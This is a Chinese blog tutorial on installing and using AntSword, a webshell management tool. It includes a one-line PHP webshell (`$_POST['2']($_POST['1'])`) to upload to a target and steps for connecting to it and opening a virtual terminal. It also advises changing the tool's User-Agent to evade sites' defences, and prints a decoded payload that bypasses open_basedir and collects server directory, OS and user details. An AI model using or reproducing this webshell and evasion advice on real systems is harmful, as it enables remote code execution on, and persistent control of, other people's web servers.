中国蚁剑(antSword)下载、安装、使用教程

晓雨风声

已于 2024-04-30 10:01:05 修改

阅读量1k

点赞数 4

文章标签： web安全

于 2024-04-29 10:59:53 首次发布

本文链接：https://blog.csdn.net/qq_46603839/article/details/138305110

版权

中国蚁剑(antSword)下载、安装、使用教程

下载地址

需要两个包

一个是项目核心源码”antSword“

https://github.com/AntSwordProject/antSword

一个是加载器

https://github.com/AntSwordProject/AntSword-Loader

安装

用下载的AntSword-Loader-v4.0.3-win32-x64.zip 以Windows版本64位来示例

解压
在这里插入图片描述

1.启动AntSword-Loader-v4.0.3-win32-x64 下的 AntSword.exe

2.点击初始化

在这里插入图片描述

3.选择下载的源码文件夹 antSword-master

如果只下载了加载器，选择一个空文件夹，加载器会自动帮你下载核心项目源码

4.等初始化完成后，重启“AntSword.exe”即可正常启动！

在这里插入图片描述
.

使用

首页点击右键添加数据

在这里插入图片描述

打开后

在这里插入图片描述

url地址就是我们木马的地址如

我们上传一个一句话木马文件 yijuhua.php

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

密码就是我们要执行的参数 $_POST 参数是1 密码就是1

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

最好选个编码方式不选默认default 是明文传输也可以自己建个编码

在这里插入图片描述

新版增加了请求信息

如果后端对请求头请求体加限制这个就有用可以加UA等请求头或者像这样的木马

<? $_POST['2']($_POST['1']); ?>

在这里插入图片描述

至于为什么是assert 可以看这篇博客
RCE漏洞总结及绕过—代码执行篇

设置完成就可以点击添加数据了

连接

双击就可以连接了对于文件双击或者编辑都可以打开

在这里插入图片描述

右键选择虚拟终端编辑数据（就是修改上面的参数）

在这里插入图片描述

还可以设置代理设成burp的代理抓个包看看

在这里插入图片描述

蚁剑的很简单但是新版的UA 不再是User-Agent: antSword/* 从modules\request.js看，变成随机UA了

如果UA有antSword/* 建议修改modules\request.js 很多网站防蚁剑

在这里插入图片描述

密码1 的数据被我们设置的chr编码了

在这里插入图片描述

添加的请求体2 没有编码

在这里插入图片描述

没有加密的是这样的

在这里插入图片描述

url解码后

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.5a40bf236d";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2e180"."19b51";echo @asenc($output);echo "a875"."de4ad";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();